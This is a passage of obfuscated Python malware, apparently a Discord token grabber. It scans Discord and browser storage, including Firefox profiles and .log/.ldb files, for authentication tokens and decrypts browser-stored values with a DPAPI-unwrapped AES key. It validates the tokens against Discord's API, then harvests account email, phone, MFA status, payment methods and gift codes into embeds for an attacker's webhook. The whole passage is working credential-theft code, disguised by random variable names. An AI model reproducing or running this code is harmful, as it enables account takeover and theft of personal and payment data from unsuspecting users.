                                    YMEWRSFZVSSMTAJBEWGHXJMGDJFEVNBLMIKYZQHKDCCYPYEYGBFWSNDEZTMPTGZHWFU = requests.get(VHQOJTBHCCHWDXKFPJSHVGVMRVSPQRGXUSXVHNGLBEUHRGOKDFUQMJXEOXLNKXWGANV, headers={'Authorization': SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW}).json()['id']
                                    if YMEWRSFZVSSMTAJBEWGHXJMGDJFEVNBLMIKYZQHKDCCYPYEYGBFWSNDEZTMPTGZHWFU not in TQIPQMSCFZYGZSVHXDHSQQMDEVWVMGQVDLIKYSBPBFXQYLENREVSSUC:
                                        QWFTACTSGDMATTDKFFZJUNVGIUPSLXVLFMASGYAGJBEWINQLJQYPSZMMMTICZNLOSEGOCHHWJBCDDDMAUFQERWPQCWTVXW.append(SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW)
                                        TQIPQMSCFZYGZSVHXDHSQQMDEVWVMGQVDLIKYSBPBFXQYLENREVSSUC.append(YMEWRSFZVSSMTAJBEWGHXJMGDJFEVNBLMIKYZQHKDCCYPYEYGBFWSNDEZTMPTGZHWFU)
                                        UCHROWMYYZLWOIZHSHCEKILYHNGPUFEIYKLKBTGNQRRIPDIRZA[SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW] = (VJUUQZNCXYHLOOSYFEAKEIWRHTWHGUNUADIWUAPOAZVDXMJJUODADMFBMDEMJDODEFXIGWAYOVXJHKGJ, f"{QKAJJWFKITFIVBMOYRVMBUCUIHPICSTODWEROENRAZYDTKRAKFZXFDGQULNPMGPKRGIJMDKHH}\\{v4r_file_name}")
            else:
                for v4r_file_name in os.listdir(QKAJJWFKITFIVBMOYRVMBUCUIHPICSTODWEROENRAZYDTKRAKFZXFDGQULNPMGPKRGIJMDKHH):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{QKAJJWFKITFIVBMOYRVMBUCUIHPICSTODWEROENRAZYDTKRAKFZXFDGQULNPMGPKRGIJMDKHH}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW in re.findall(VDSOHXYWIAKADEWGWKYFXNKOJOCYZUQUKUIRZHMLDNVJQYENEXQHYAUXIDOWQNXEMAMMICAXEJOYZZTIUJGDHV, v4r_line.strip()):
                                if validate_t0k3n(SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW, VHQOJTBHCCHWDXKFPJSHVGVMRVSPQRGXUSXVHNGLBEUHRGOKDFUQMJXEOXLNKXWGANV):
                                    YMEWRSFZVSSMTAJBEWGHXJMGDJFEVNBLMIKYZQHKDCCYPYEYGBFWSNDEZTMPTGZHWFU = requests.get(VHQOJTBHCCHWDXKFPJSHVGVMRVSPQRGXUSXVHNGLBEUHRGOKDFUQMJXEOXLNKXWGANV, headers={'Authorization': SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW}).json()['id']
                                    if YMEWRSFZVSSMTAJBEWGHXJMGDJFEVNBLMIKYZQHKDCCYPYEYGBFWSNDEZTMPTGZHWFU not in TQIPQMSCFZYGZSVHXDHSQQMDEVWVMGQVDLIKYSBPBFXQYLENREVSSUC:
                                        QWFTACTSGDMATTDKFFZJUNVGIUPSLXVLFMASGYAGJBEWINQLJQYPSZMMMTICZNLOSEGOCHHWJBCDDDMAUFQERWPQCWTVXW.append(SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW)
                                        TQIPQMSCFZYGZSVHXDHSQQMDEVWVMGQVDLIKYSBPBFXQYLENREVSSUC.append(YMEWRSFZVSSMTAJBEWGHXJMGDJFEVNBLMIKYZQHKDCCYPYEYGBFWSNDEZTMPTGZHWFU)
                                        UCHROWMYYZLWOIZHSHCEKILYHNGPUFEIYKLKBTGNQRRIPDIRZA[SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW] = (VJUUQZNCXYHLOOSYFEAKEIWRHTWHGUNUADIWUAPOAZVDXMJJUODADMFBMDEMJDODEFXIGWAYOVXJHKGJ, f"{QKAJJWFKITFIVBMOYRVMBUCUIHPICSTODWEROENRAZYDTKRAKFZXFDGQULNPMGPKRGIJMDKHH}\\{v4r_file_name}")

        if os.path.exists(FFPUONROQXTELABOJOTGOCKKFXBTEDGLIFJGUWEOWLJFLZXTKAZRDOKIJXN + "\\Mozilla\\Firefox\\Profiles"):
            for QKAJJWFKITFIVBMOYRVMBUCUIHPICSTODWEROENRAZYDTKRAKFZXFDGQULNPMGPKRGIJMDKHH, _, v4r_files in os.walk(FFPUONROQXTELABOJOTGOCKKFXBTEDGLIFJGUWEOWLJFLZXTKAZRDOKIJXN + "\\Mozilla\\Firefox\\Profiles"):
                for v4r__file in v4r_files:
                    if v4r__file.endswith('.sqlite'):
                        with open(f'{QKAJJWFKITFIVBMOYRVMBUCUIHPICSTODWEROENRAZYDTKRAKFZXFDGQULNPMGPKRGIJMDKHH}\\{v4r__file}', errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW in re.findall(VDSOHXYWIAKADEWGWKYFXNKOJOCYZUQUKUIRZHMLDNVJQYENEXQHYAUXIDOWQNXEMAMMICAXEJOYZZTIUJGDHV, v4r_line.strip()):
                                    if validate_t0k3n(SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW, VHQOJTBHCCHWDXKFPJSHVGVMRVSPQRGXUSXVHNGLBEUHRGOKDFUQMJXEOXLNKXWGANV):
                                        YMEWRSFZVSSMTAJBEWGHXJMGDJFEVNBLMIKYZQHKDCCYPYEYGBFWSNDEZTMPTGZHWFU = requests.get(VHQOJTBHCCHWDXKFPJSHVGVMRVSPQRGXUSXVHNGLBEUHRGOKDFUQMJXEOXLNKXWGANV, headers={'Authorization': SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW}).json()['id']
                                        if YMEWRSFZVSSMTAJBEWGHXJMGDJFEVNBLMIKYZQHKDCCYPYEYGBFWSNDEZTMPTGZHWFU not in TQIPQMSCFZYGZSVHXDHSQQMDEVWVMGQVDLIKYSBPBFXQYLENREVSSUC:
                                            QWFTACTSGDMATTDKFFZJUNVGIUPSLXVLFMASGYAGJBEWINQLJQYPSZMMMTICZNLOSEGOCHHWJBCDDDMAUFQERWPQCWTVXW.append(SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW)
                                            TQIPQMSCFZYGZSVHXDHSQQMDEVWVMGQVDLIKYSBPBFXQYLENREVSSUC.append(YMEWRSFZVSSMTAJBEWGHXJMGDJFEVNBLMIKYZQHKDCCYPYEYGBFWSNDEZTMPTGZHWFU)
                                            UCHROWMYYZLWOIZHSHCEKILYHNGPUFEIYKLKBTGNQRRIPDIRZA[SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW] = ('Firefox', f"{QKAJJWFKITFIVBMOYRVMBUCUIHPICSTODWEROENRAZYDTKRAKFZXFDGQULNPMGPKRGIJMDKHH}\\{v4r__file}")
        return QWFTACTSGDMATTDKFFZJUNVGIUPSLXVLFMASGYAGJBEWINQLJQYPSZMMMTICZNLOSEGOCHHWJBCDDDMAUFQERWPQCWTVXW, UCHROWMYYZLWOIZHSHCEKILYHNGPUFEIYKLKBTGNQRRIPDIRZA

    def validate_t0k3n(SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW, VHQOJTBHCCHWDXKFPJSHVGVMRVSPQRGXUSXVHNGLBEUHRGOKDFUQMJXEOXLNKXWGANV):
        return requests.get(VHQOJTBHCCHWDXKFPJSHVGVMRVSPQRGXUSXVHNGLBEUHRGOKDFUQMJXEOXLNKXWGANV, headers={'Authorization': SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW}).status_code == 200

    def decrypt_val(TGBIFHUQSROUBIHLCIISDPPWVZUDJEEBKQJLYNNZXJAMJAVWQQPMEDDCGXTVLWJ, v4r_master_key):
        v4r_iv = TGBIFHUQSROUBIHLCIISDPPWVZUDJEEBKQJLYNNZXJAMJAVWQQPMEDDCGXTVLWJ[3:15]
        v4r_payload = TGBIFHUQSROUBIHLCIISDPPWVZUDJEEBKQJLYNNZXJAMJAVWQQPMEDDCGXTVLWJ[15:]
        v4r_cipher = AES.new(v4r_master_key, AES.MODE_GCM, v4r_iv)
        return v4r_cipher.decrypt(v4r_payload)[:-16].decode()

    def get_master_key(QKAJJWFKITFIVBMOYRVMBUCUIHPICSTODWEROENRAZYDTKRAKFZXFDGQULNPMGPKRGIJMDKHH):
        if not os.path.exists(QKAJJWFKITFIVBMOYRVMBUCUIHPICSTODWEROENRAZYDTKRAKFZXFDGQULNPMGPKRGIJMDKHH):
            return None
        with open(QKAJJWFKITFIVBMOYRVMBUCUIHPICSTODWEROENRAZYDTKRAKFZXFDGQULNPMGPKRGIJMDKHH, "r", encoding="utf-8") as v4r_f:
            v4r_local_state = json.load(v4r_f)
        v4r_master_key = base64.b64decode(v4r_local_state["os_crypt"]["encrypted_key"])[5:]
        return CryptUnprotectData(v4r_master_key, None, None, None, 0)[1]

    def upload_t0k3n5():
        QWFTACTSGDMATTDKFFZJUNVGIUPSLXVLFMASGYAGJBEWINQLJQYPSZMMMTICZNLOSEGOCHHWJBCDDDMAUFQERWPQCWTVXW, UCHROWMYYZLWOIZHSHCEKILYHNGPUFEIYKLKBTGNQRRIPDIRZA = extr4ct_t0k3n5()
        MUUVXCEOHXTYRDHYNJVKAZAYUZDJZHTRUFWVETVNUCBWJIAMTWRXDCDIAIIQQIFBXEQMPOOOJLHRLHEMOXTQUPROJGIZICC = SyncWebhook.from_url(IRVSXQEWORQNCPNYJWXUARMTWBVSIBTHPIGCGNNIBMVPQILTZJDKCJNRFCOVXTMKVRAONNJTXPVPOQX)

        if not QWFTACTSGDMATTDKFFZJUNVGIUPSLXVLFMASGYAGJBEWINQLJQYPSZMMMTICZNLOSEGOCHHWJBCDDDMAUFQERWPQCWTVXW:
            ETLYEVITTXUDRMCGKUQCXCTQIZNQHJRGQLFIYUNDVDUIKNQLRAKARCUTQU = Embed(
                title=f'Discord Token `{XJSLVQNQTGIKEGBIFMHZXVESMILUPDZMVSBRUTTUSDVISDAJLHRAQYGRELMJDVSLHUIYGTVGYSEWELPRQRZLUWFW} "{NZPBHKLPXUONPGQBWBHDLQWGJJVHWAVGGTHPMXHMBYRJNJDXUMCZUBSDICQEIDNDWVEIYUMUACVSTEAPQT}"`:', 
                description=f"No discord tokens found.",
                color=DYYJNOODIRRNJIMFFKAPWJVJOLGUDXYLUWVVJKPFNJPBAQKZXPJFRJWIYEGPYWXSBEX)
            ETLYEVITTXUDRMCGKUQCXCTQIZNQHJRGQLFIYUNDVDUIKNQLRAKARCUTQU.set_footer(text=UQNIKGREAMWSDRRWEOGXJXLXTQRFXWFUSZENMCFQJGITHRENYRQBMPZQLHRU, icon_url=QOLVKKQIAJDOYVDRESETHAUKQYKLEXNVJMBKTNHTNVNIHEYCCBQ)
            MUUVXCEOHXTYRDHYNJVKAZAYUZDJZHTRUFWVETVNUCBWJIAMTWRXDCDIAIIQQIFBXEQMPOOOJLHRLHEMOXTQUPROJGIZICC.send(embed=ETLYEVITTXUDRMCGKUQCXCTQIZNQHJRGQLFIYUNDVDUIKNQLRAKARCUTQU, username=CGTTQKDOHQKBVQZQKOHAIUNJLGNWOPIHTPLVNQNSZMKGFGHUZQXNKTMGFOHABAHYGOICUTWLJEOOADFERLEFOEIELYRJWDYF, avatar_url=QOLVKKQIAJDOYVDRESETHAUKQYKLEXNVJMBKTNHTNVNIHEYCCBQ)
            return
        
        for SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW_d15c0rd in QWFTACTSGDMATTDKFFZJUNVGIUPSLXVLFMASGYAGJBEWINQLJQYPSZMMMTICZNLOSEGOCHHWJBCDDDMAUFQERWPQCWTVXW:
            MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ = requests.get('https://discord.com/api/v8/users/@me', headers={'Authorization': SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW_d15c0rd}).json()

            EQJPPROJUVSFNYVFMTIJVDQSNJRGIPWOLDYGYIPSSGMDPDANQOGIDLKSXKYHFAZGJUPRKIVVHCN = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('username', "None") + '#' + MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('discriminator', "None")
            QHXEMBBVYISBVONEKJXRMWWZONITXFHODUZBEWTINMPBLVPPVVEBPFYBPLXGJHDUHITD = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('global_name', "None")
            YNWLDTPLEXYPDUKVZJEQPRDWTQNZLZSALAZLJNVYTSTMHFMGAGGNJ = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('id', "None")
            EXQBIIHTYZNDPOHXNMNTOJPGKDMRUHWXMIBGGZYXHAXPIWYYYZGCVHVKPNUEOOUISOQMTCRHZBUYTUYJQOMWNTSLUTXHWY = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('email', "None")
            LHEBOHYLVOWVULOFGICVHNJNZURIXXDFNYAUEYCZRBZYFTIYFFYJERVVNFNYUUPVPLNPPFJEECLYJZIXOJLOMBLCIBRWR = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('verified', "None")
            FRILWOMXMNTZRGGKJLJTQJYCMSLXCBBJQNVVLMDFAPBDUTGAHLJW = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('phone', "None")
            NMKGUYMHIYWUVRTLMHDILBXJGKXNLZTYRUGJMEZBQSNKURRRFKPZQUOIPDUYNTVBKWHCRRX = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('locale', "None")
            UCRMLGPGHDKJOBLSZJYOTFQLLVGARVEZYFEKDUBTHYUTPHZWPWALDDDHTWO = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('mfa_enabled', "None")

            try:
                if MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('premium_type', 'None') == 0:
                    FFVZIWHPMLSWDXWMVOEJJOJTIXDQEMWBXNHRUUTTNDIOKIBOGUOUJOILFLMLXWZEBJOJFVRZLOVIZLFCCNQLFFJYDTGQEOTEBJZZ = 'False'
                elif MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('premium_type', 'None') == 1:
                    FFVZIWHPMLSWDXWMVOEJJOJTIXDQEMWBXNHRUUTTNDIOKIBOGUOUJOILFLMLXWZEBJOJFVRZLOVIZLFCCNQLFFJYDTGQEOTEBJZZ = 'Nitro Classic'
                elif MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('premium_type', 'None') == 2:
                    FFVZIWHPMLSWDXWMVOEJJOJTIXDQEMWBXNHRUUTTNDIOKIBOGUOUJOILFLMLXWZEBJOJFVRZLOVIZLFCCNQLFFJYDTGQEOTEBJZZ = 'Nitro Boosts'
                elif MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('premium_type', 'None') == 3:
                    FFVZIWHPMLSWDXWMVOEJJOJTIXDQEMWBXNHRUUTTNDIOKIBOGUOUJOILFLMLXWZEBJOJFVRZLOVIZLFCCNQLFFJYDTGQEOTEBJZZ = 'Nitro Basic'
                else:
                    FFVZIWHPMLSWDXWMVOEJJOJTIXDQEMWBXNHRUUTTNDIOKIBOGUOUJOILFLMLXWZEBJOJFVRZLOVIZLFCCNQLFFJYDTGQEOTEBJZZ = 'False'
            except:
                FFVZIWHPMLSWDXWMVOEJJOJTIXDQEMWBXNHRUUTTNDIOKIBOGUOUJOILFLMLXWZEBJOJFVRZLOVIZLFCCNQLFFJYDTGQEOTEBJZZ = "None"

            try: 
                YXWGHANHNSPIYLEXOZVXRHFDTUFDVQHTHRFCHABHQFJPHJJJQWXTQLCKKGCOEJJAIAIEZHRJVGBIOJKXWXPITMDYT = f"https://cdn.discordapp.com/avatars/{YNWLDTPLEXYPDUKVZJEQPRDWTQNZLZSALAZLJNVYTSTMHFMGAGGNJ}/{MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ['avatar']}.gif" if requests.get(f"https://cdn.discordapp.com/avatars/{YNWLDTPLEXYPDUKVZJEQPRDWTQNZLZSALAZLJNVYTSTMHFMGAGGNJ}/{MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ['avatar']}.gif").status_code == 200 else f"https://cdn.discordapp.com/avatars/{YNWLDTPLEXYPDUKVZJEQPRDWTQNZLZSALAZLJNVYTSTMHFMGAGGNJ}/{MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ['avatar']}.png"
            except: 
                YXWGHANHNSPIYLEXOZVXRHFDTUFDVQHTHRFCHABHQFJPHJJJQWXTQLCKKGCOEJJAIAIEZHRJVGBIOJKXWXPITMDYT = QOLVKKQIAJDOYVDRESETHAUKQYKLEXNVJMBKTNHTNVNIHEYCCBQ

            try:
                SUEBBQXIXCGSOMSENDNQOKANRIMIVPCNMZHORILCCJEBKXEBPXMXLMZTZJGCCDAHFZHMCBSHQIZKNHJODHWUCEAECMGUDVXNVF = requests.get('https://discord.com/api/v6/users/@me/billing/payment-sources', headers={'Authorization': SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW_d15c0rd}).json()
                if SUEBBQXIXCGSOMSENDNQOKANRIMIVPCNMZHORILCCJEBKXEBPXMXLMZTZJGCCDAHFZHMCBSHQIZKNHJODHWUCEAECMGUDVXNVF:
                    AIFIVNCNRMCAXMFVXINJSXETUXVBNZCFHKIGEYLSRDGCUBMKIBBMCOPINDUMQIYWP = []

                    for v4r_method in SUEBBQXIXCGSOMSENDNQOKANRIMIVPCNMZHORILCCJEBKXEBPXMXLMZTZJGCCDAHFZHMCBSHQIZKNHJODHWUCEAECMGUDVXNVF:
                        if v4r_method['type'] == 1:
                            AIFIVNCNRMCAXMFVXINJSXETUXVBNZCFHKIGEYLSRDGCUBMKIBBMCOPINDUMQIYWP.append('CB')
                        elif v4r_method['type'] == 2:
                            AIFIVNCNRMCAXMFVXINJSXETUXVBNZCFHKIGEYLSRDGCUBMKIBBMCOPINDUMQIYWP.append("Paypal")
                        else:
                            AIFIVNCNRMCAXMFVXINJSXETUXVBNZCFHKIGEYLSRDGCUBMKIBBMCOPINDUMQIYWP.append('Other')
                    AIFIVNCNRMCAXMFVXINJSXETUXVBNZCFHKIGEYLSRDGCUBMKIBBMCOPINDUMQIYWP = ' / '.join(AIFIVNCNRMCAXMFVXINJSXETUXVBNZCFHKIGEYLSRDGCUBMKIBBMCOPINDUMQIYWP)
                else:
                    AIFIVNCNRMCAXMFVXINJSXETUXVBNZCFHKIGEYLSRDGCUBMKIBBMCOPINDUMQIYWP = "None"
            except:
                AIFIVNCNRMCAXMFVXINJSXETUXVBNZCFHKIGEYLSRDGCUBMKIBBMCOPINDUMQIYWP = "None"

            try:
                TTCTGFAVPWFLZPOZXYPCPOFCSYDNTKHAWBFHGBWVNADVRJBRVKWCIRZYKVUHOGTMFZAYLZMHYEVMVMDMARECAYOWABVGZTO = requests.get('https://discord.com/api/v9/users/@me/outbound-promotions/codes', headers={'Authorization': SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW_d15c0rd}).json()
                if TTCTGFAVPWFLZPOZXYPCPOFCSYDNTKHAWBFHGBWVNADVRJBRVKWCIRZYKVUHOGTMFZAYLZMHYEVMVMDMARECAYOWABVGZTO:
                    JEXBFMCTPLOQOBQGNPKOSWHPMYINZIOXQKOXFAKPBTCEPZPSHXWRXPVWYITYBLZZLTQMQCLBDAWXFIBCOGZARFVIPDIARXXXBIKT = []
                    for PXNWNKQIJJARDTXTZJPWFLAXOZSPFYQOBFWLPZQFLYLBFQQIEAXRFISRHXWMZAJTKHDHKRMOHLBDFZTWD in TTCTGFAVPWFLZPOZXYPCPOFCSYDNTKHAWBFHGBWVNADVRJBRVKWCIRZYKVUHOGTMFZAYLZMHYEVMVMDMARECAYOWABVGZTO:
                        VJUUQZNCXYHLOOSYFEAKEIWRHTWHGUNUADIWUAPOAZVDXMJJUODADMFBMDEMJDODEFXIGWAYOVXJHKGJ = PXNWNKQIJJARDTXTZJPWFLAXOZSPFYQOBFWLPZQFLYLBFQQIEAXRFISRHXWMZAJTKHDHKRMOHLBDFZTWD['promotion']['outbound_title']
                        PXNWNKQIJJARDTXTZJPWFLAXOZSPFYQOBFWLPZQFLYLBFQQIEAXRFISRHXWMZAJTKHDHKRMOHLBDFZTWD = PXNWNKQIJJARDTXTZJPWFLAXOZSPFYQOBFWLPZQFLYLBFQQIEAXRFISRHXWMZAJTKHDHKRMOHLBDFZTWD['code']
                        DBGSCAXWXPLOSWBXJUURMSONFDBNQOCWYRHQPXXQDLSZFQBYWZYABKLXOBRLWZBDKRRWKQTCZRACNCRLMVPEZWRATUJGZ = f"Gift: {VJUUQZNCXYHLOOSYFEAKEIWRHTWHGUNUADIWUAPOAZVDXMJJUODADMFBMDEMJDODEFXIGWAYOVXJHKGJ}\nCode: {PXNWNKQIJJARDTXTZJPWFLAXOZSPFYQOBFWLPZQFLYLBFQQIEAXRFISRHXWMZAJTKHDHKRMOHLBDFZTWD}"
                        if len('\n\n'.join(PXNWNKQIJJARDTXTZJPWFLAXOZSPFYQOBFWLPZQFLYLBFQQIEAXRFISRHXWMZAJTKHDHKRMOHLBDFZTWD)) + len(DBGSCAXWXPLOSWBXJUURMSONFDBNQOCWYRHQPXXQDLSZFQBYWZYABKLXOBRLWZBDKRRWKQTCZRACNCRLMVPEZWRATUJGZ) >= 1024:
                            break
                        JEXBFMCTPLOQOBQGNPKOSWHPMYINZIOXQKOXFAKPBTCEPZPSHXWRXPVWYITYBLZZLTQMQCLBDAWXFIBCOGZARFVIPDIARXXXBIKT.append(DBGSCAXWXPLOSWBXJUURMSONFDBNQOCWYRHQPXXQDLSZFQBYWZYABKLXOBRLWZBDKRRWKQTCZRACNCRLMVPEZWRATUJGZ)
                    if len(JEXBFMCTPLOQOBQGNPKOSWHPMYINZIOXQKOXFAKPBTCEPZPSHXWRXPVWYITYBLZZLTQMQCLBDAWXFIBCOGZARFVIPDIARXXXBIKT) > 0:
                        PXNWNKQIJJARDTXTZJPWFLAXOZSPFYQOBFWLPZQFLYLBFQQIEAXRFISRHXWMZAJTKHDHKRMOHLBDFZTWD = '\n\n'.join(JEXBFMCTPLOQOBQGNPKOSWHPMYINZIOXQKOXFAKPBTCEPZPSHXWRXPVWYITYBLZZLTQMQCLBDAWXFIBCOGZARFVIPDIARXXXBIKT)
                    else:
                        PXNWNKQIJJARDTXTZJPWFLAXOZSPFYQOBFWLPZQFLYLBFQQIEAXRFISRHXWMZAJTKHDHKRMOHLBDFZTWD = "None"
                else:
                    PXNWNKQIJJARDTXTZJPWFLAXOZSPFYQOBFWLPZQFLYLBFQQIEAXRFISRHXWMZAJTKHDHKRMOHLBDFZTWD = "None"
            except:
                PXNWNKQIJJARDTXTZJPWFLAXOZSPFYQOBFWLPZQFLYLBFQQIEAXRFISRHXWMZAJTKHDHKRMOHLBDFZTWD = "None"
        
            v4r_software_name, QKAJJWFKITFIVBMOYRVMBUCUIHPICSTODWEROENRAZYDTKRAKFZXFDGQULNPMGPKRGIJMDKHH = UCHROWMYYZLWOIZHSHCEKILYHNGPUFEIYKLKBTGNQRRIPDIRZA.get(SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW_d15c0rd, ("Unknown Software", "Unknown location"))

            embed = Embed(title=f'Discord Token `{XJSLVQNQTGIKEGBIFMHZXVESMILUPDZMVSBRUTTUSDVISDAJLHRAQYGRELMJDVSLHUIYGTVGYSEWELPRQRZLUWFW} "{NZPBHKLPXUONPGQBWBHDLQWGJJVHWAVGGTHPMXHMBYRJNJDXUMCZUBSDICQEIDNDWVEIYUMUACVSTEAPQT}"`:', color=DYYJNOODIRRNJIMFFKAPWJVJOLGUDXYLUWVVJKPFNJPBAQKZXPJFRJWIYEGPYWXSBEX)      
            embed.add_field(name=":file_folder: Path:", value=f"```{QKAJJWFKITFIVBMOYRVMBUCUIHPICSTODWEROENRAZYDTKRAKFZXFDGQULNPMGPKRGIJMDKHH}```", inline=True)
            embed.add_field(name=":globe_with_meridians: Token:", value=f"```{SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW_d15c0rd}```", inline=True)
            embed.add_field(name=":package: Software:", value=f"```{v4r_software_name}```", inline=True)
            embed.add_field(name=":bust_in_silhouette: Username:", value=f"```{EQJPPROJUVSFNYVFMTIJVDQSNJRGIPWOLDYGYIPSSGMDPDANQOGIDLKSXKYHFAZGJUPRKIVVHCN}```", inline=True)
            embed.add_field(name=":bust_in_silhouette: Display Name:", value=f"```{QHXEMBBVYISBVONEKJXRMWWZONITXFHODUZBEWTINMPBLVPPVVEBPFYBPLXGJHDUHITD}```", inline=True)
            embed.add_field(name=":robot: Id:", value=f"```{YNWLDTPLEXYPDUKVZJEQPRDWTQNZLZSALAZLJNVYTSTMHFMGAGGNJ}```", inline=True)
            embed.add_field(name=":e_mail: Email:", value=f"```{EXQBIIHTYZNDPOHXNMNTOJPGKDMRUHWXMIBGGZYXHAXPIWYYYZGCVHVKPNUEOOUISOQMTCRHZBUYTUYJQOMWNTSLUTXHWY}```", inline=True)
            embed.add_field(name=":white_check_mark: Email Verified:", value=f"```{LHEBOHYLVOWVULOFGICVHNJNZURIXXDFNYAUEYCZRBZYFTIYFFYJERVVNFNYUUPVPLNPPFJEECLYJZIXOJLOMBLCIBRWR}```", inline=True)
            embed.add_field(name=":telephone_receiver: Phone:", value=f"```{FRILWOMXMNTZRGGKJLJTQJYCMSLXCBBJQNVVLMDFAPBDUTGAHLJW}```", inline=True)   
            embed.add_field(name=":rocket: Nitro:", value=f"```{FFVZIWHPMLSWDXWMVOEJJOJTIXDQEMWBXNHRUUTTNDIOKIBOGUOUJOILFLMLXWZEBJOJFVRZLOVIZLFCCNQLFFJYDTGQEOTEBJZZ}```", inline=True)
            embed.add_field(name=":earth_africa: Language:", value=f"```{NMKGUYMHIYWUVRTLMHDILBXJGKXNLZTYRUGJMEZBQSNKURRRFKPZQUOIPDUYNTVBKWHCRRX}```", inline=True)
